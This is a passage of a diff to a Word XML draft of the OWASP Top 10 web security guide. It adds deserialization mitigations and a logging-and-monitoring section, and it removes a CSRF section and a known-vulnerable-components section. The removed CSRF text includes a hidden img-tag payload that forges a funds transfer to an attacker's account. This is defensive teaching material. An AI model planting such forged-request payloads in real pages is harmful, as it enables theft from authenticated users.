-        <w:t xml:space="preserve">Consider using the “SameSite=strict” flag on all cookies, which is increasingly supported in browsers.</w:t>
+        <w:t xml:space="preserve">If this not possible</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1031"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Implement integrity checks or encryption of the serialized objects to prevent hostile creation, tampering, replay and gadget calls</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1031"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Isolate code that deserializes, such that it runs in very low privilege environments, such as temporary containers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1031"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Enforce type constraints over serialized objects; typically code is expecting a particular class</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1031"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Log deserialization exceptions and failures, such as where the incoming type is not the expected type, or the deserialization throws exceptions.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Larger and high performing organizations should also consider:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1032"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Rate limit API or methods that deserialize</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1032"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Restrict or monitor incoming and outgoing network connectivity from containers or servers that deserialize</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1032"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Monitor deserialization, alerting if a user deserializes constantly.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="96" w:name="example-attack-scenarios"/>
-      <w:bookmarkEnd w:id="96"/>
-      <w:r>
-        <w:t xml:space="preserve">Example Attack Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The application allows a user to submit a state changing request that does not include anything secret. For example:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1027"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId38">
+      <w:bookmarkStart w:id="104" w:name="references-6"/>
+      <w:bookmarkEnd w:id="104"/>
+      <w:r>
+        <w:t xml:space="preserve">References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="105" w:name="owasp-6"/>
+      <w:bookmarkEnd w:id="105"/>
+      <w:r>
+        <w:t xml:space="preserve">OWASP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1033"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId106">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=4673243243</w:t>
+          <w:t xml:space="preserve">OWASP Proactive Controls - Validate All Inputs</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">So, the attacker constructs a request that will transfer money from the victim’s account to the attacker’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">&lt;img src="</w:t>
-      </w:r>
-      <w:hyperlink r:id="rId97">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">http://example.com/app/transferFunds?amount=1500&amp;destinationAccount=attackersAcct#</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">" width="0" height="0" /&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If the victim visits any of the attacker’s sites while already authenticated to example.com, these forged requests will automatically include the user’s session info, authorizing the attacker’s request.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="98" w:name="references-6"/>
-      <w:bookmarkEnd w:id="98"/>
-      <w:r>
-        <w:t xml:space="preserve">References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="99" w:name="owasp-5"/>
-      <w:bookmarkEnd w:id="99"/>
-      <w:r>
-        <w:t xml:space="preserve">OWASP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1028"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId38">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">OWASP Proactive Controls - TBA</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1028"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId38">
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1033"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId46">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -5318,66 +5215,54 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1028"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId38">
+          <w:numId w:val="1033"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId107">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">OWASP Testing Guide - TBA</w:t>
+          <w:t xml:space="preserve">OWASP Cheat Sheet - Deserialization</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1028"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId38">
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="108" w:name="external-6"/>
+      <w:bookmarkEnd w:id="108"/>
+      <w:r>
+        <w:t xml:space="preserve">External</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1034"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId109">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">OWASP Cheat Sheet - TBA</w:t>
+          <w:t xml:space="preserve">CWE-502: Deserialization of Untrusted Data</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="100" w:name="external-5"/>
-      <w:bookmarkEnd w:id="100"/>
-      <w:r>
-        <w:t xml:space="preserve">External</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1029"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">CWE Entry 352 on CSRF</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="101" w:name="a9-using-compenents-with-known-vulnerabilities"/>
-      <w:bookmarkEnd w:id="101"/>
-      <w:r>
-        <w:t xml:space="preserve">A9 Using Compenents with Known Vulnerabilities</w:t>
+      <w:bookmarkStart w:id="110" w:name="a8-insufficient-logging-and-monitoring"/>
+      <w:bookmarkEnd w:id="110"/>
+      <w:r>
+        <w:t xml:space="preserve">A8 Insufficient Logging and Monitoring</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -5513,40 +5398,40 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">EASY</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">COMMON</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">AVERAGE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">SEVERE</w:t>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5558,63 +5443,6 @@
             </w:pPr>
             <w:r>
               <w:t xml:space="preserve">App Specific</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5622,10 +5450,18 @@
     </w:tbl>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Exploitation of insufficient logging and monitoring is the bedrock of every major incident. Attackers rely on the lack of monitoring to achieve their goals without being detected. There is little data on the prevalence of this issue, and so this issue has been selected by the community. The impact of this issue is moderate to severe, due to delays in activating incident response, allowing the attacker more time to attack, and impairs understanding of what was disclosed or breached.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="102" w:name="am-i-vulnerable-to-attack-6"/>
-      <w:bookmarkEnd w:id="102"/>
+      <w:bookmarkStart w:id="111" w:name="am-i-vulnerable-to-attack-7"/>
+      <w:bookmarkEnd w:id="111"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -5635,38 +5471,147 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The challenge is to continuously monitor the components (both client-side and server-side) you are using for new vulnerability reports. This monitoring can be very difficult because vulnerability reports are not standardized, making them hard to find and search for the details you need (e.g., the exact component in a product family that has the vulnerability). Worst of all, many vulnerabilities never get reported to central clearinghouses like</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId38">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">CVE</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">and</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId38">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">NVD</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">.</w:t>
+        <w:t xml:space="preserve">Insufficient logging and monitoring occurs anytime:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1035"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Auditable events, such as logins, failed logins, and high value transactions are not logged</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1035"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Logs are not monitored for suspicious activity</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1035"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Alerting or escalation as per the risk of the data held by the application is not in place or effective.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="112" w:name="how-do-i-prevent-7"/>
+      <w:bookmarkEnd w:id="112"/>
+      <w:r>
+        <w:t xml:space="preserve">How do I prevent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">As per the risk of the data stored or processed by the application:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1036"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ensure all login and high value transactions can be logged</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1036"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ensure sensitive and private information is not logged, or masked or truncated as per privacy laws and regulations</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1036"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ensure stack traces and detailed errors are not sent to the screen, but to logs</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1036"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ensure logs cannot easily be deleted or cleared without authorization</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1036"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Establish effective monitoring and alerting, such that suspicious activities such as brute force attacks or business loss are detected and responded within acceptable time periods.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Large or high performing organizations may wish to invest in log correlation and analysis or security event incident management (SIEM) software or services. Open source and commercial offerings should be considered in light of organizational objectives.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="113" w:name="example-scenarios-6"/>
+      <w:bookmarkEnd w:id="113"/>
+      <w:r>
+        <w:t xml:space="preserve">Example Scenarios</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Target, a large US retailer, had an internal malware analysis sandbox analyzing attachments. The sandbox software had detected potentially unwanted software, but no one responded to this detection. By the time the point of sale breach was discovered, the sandbox had been alerting on this issue for over six months. Since this time, Target has invested heavily in security operations, including training, and network and application oversight.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5674,211 +5619,15 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. This process can be done manually, or with automated tools. If a vulnerability in a component is discovered, carefully evaluate whether you are actually vulnerable. Check to see if your code uses the vulnerable part of the component and whether the flaw could result in an impact you care about. Both checks can be difficult to perform as vulnerability reports can be deliberately vague.</w:t>
+        <w:t xml:space="preserve">An open source project forum software run by a small team was hacked using a flaw in its software. The attackers managed to wipe out the internal source code repository containing the next version, and all of the forum contents. Although source could be recovered, the lack of monitoring, logging or alerting led to a far worse breach. The forum software project is no longer active as a result of this issue.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="103" w:name="how-do-i-prevent-7"/>
-      <w:bookmarkEnd w:id="103"/>
-      <w:r>
-        <w:t xml:space="preserve">How do I prevent</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Most component projects do not create vulnerability patches for old versions. So the only way to fix the problem is to upgrade to the next version, which can require other code changes. Software projects should have a process in place to:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1030"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Continuously inventory the versions of both client-side and server-side components and their dependencies using tools like</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId104">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">versions</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId105">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">DependencyCheck</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId106">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">retire.js</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">, etc.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1030"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Continuously monitor sources like</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId107">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">National Vulnerability Database (NVD)</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">for vulnerabilities in your components. Use software composition analysis tools to automate the process.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1030"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Analyze libraries to be sure they are actually invoked at runtime before making changes, as the majority of components are never loaded or invoked.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1030"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Decide whether to upgrade component (and rewrite application to match if needed) or deploy a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId108">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">virtual patch</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">that analyzes HTTP traffic, data flow, or code execution and prevents vulnerabilities from being exploited.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="109" w:name="example-scenarios-6"/>
-      <w:bookmarkEnd w:id="109"/>
-      <w:r>
-        <w:t xml:space="preserve">Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Components almost always run with the full privilege of the application, so flaws in any component can result in serious impact. Such flaws can be accidental (e.g., coding error) or intentional (e.g., backdoor in component). Some example exploitable component vulnerabilities discovered are:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1031"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Apache CXF Authentication Bypass – By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF is a services framework, not to be confused with the Apache Application Server.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1031"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Struts 2 Remote Code Execution – Sending an attack in the Content-Type header causes the content of that header to be evaluated as an OGNL expression, which enables execution of arbitrary code on the server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1031"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Applications using a vulnerable version of either component are susceptible to attack as both components are directly accessible by application users. Other vulnerable libraries, used deeper in an application, may be harder to exploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="110" w:name="references-7"/>
-      <w:bookmarkEnd w:id="110"/>
+      <w:bookmarkStart w:id="114" w:name="references-7"/>
+      <w:bookmarkEnd w:id="114"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -5887,8 +5636,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="111" w:name="owasp-6"/>
-      <w:bookmarkEnd w:id="111"/>
+      <w:bookmarkStart w:id="115" w:name="owasp-7"/>
+      <w:bookmarkEnd w:id="115"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -5897,202 +5646,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1032"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId38">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">OWASP Proactive Controls - TBA</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1032"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId38">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">OWASP Application Security Verification Standard - TBA</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1032"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId38">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">OWASP Testing Guide - TBA</w:t>
-        </w:r>
-      </w:hyperlink>
-    </w:p>
-    <w:p>
-      <w:pPr>
